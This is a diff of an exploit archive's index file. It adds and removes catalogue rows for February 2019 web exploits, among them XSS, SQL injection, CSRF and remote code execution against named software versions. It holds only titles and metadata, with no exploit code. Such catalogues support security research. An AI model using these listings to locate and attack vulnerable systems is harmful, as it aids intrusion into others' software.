-46364,exploits/hardware/webapps/46364.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)",2019-02-13,"Ronnie T Baby",webapps,hardware,80
 46344,exploits/cgi/webapps/46344.txt,"IPFire 2.21 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,443
 46347,exploits/php/webapps/46347.txt,"MyBB Bans List 1.0 - Cross-Site Scripting",2019-02-11,0xB9,webapps,php,80
 46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - Authenticated Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,
@@ -40830,6 +40833,12 @@ id,file,description,date,author,type,platform,port
 46352,exploits/linux/webapps/46352.rb,"Jenkins 2.150.2 - Remote Command Execution (Metasploit)",2019-02-12,AkkuS,webapps,linux,
 46353,exploits/aspx/webapps/46353.cs,"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution",2019-02-12,"Dustin Cobb",webapps,aspx,
 46354,exploits/php/webapps/46354.txt,"LayerBB 1.1.2 - Cross-Site Scripting",2019-02-12,0xB9,webapps,php,80
-46365,exploits/hardware/webapps/46365.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)",2019-02-13,"Ronnie T Baby",webapps,hardware,80
 46366,exploits/php/webapps/46366.txt,"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
 46368,exploits/php/webapps/46368.txt,"PilusCart 1.4.1 - 'send' SQL Injection",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
+46372,exploits/php/webapps/46372.txt,"DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,
+46373,exploits/php/webapps/46373.txt,"DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80
+46374,exploits/php/webapps/46374.txt,"DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80
+46375,exploits/php/webapps/46375.txt,"DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
+46376,exploits/php/webapps/46376.txt,"DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
+46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection",2019-02-14,B0UG,webapps,php,80
+46379,exploits/php/webapps/46379.txt,"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)",2019-02-14,0xB9,webapps,php,80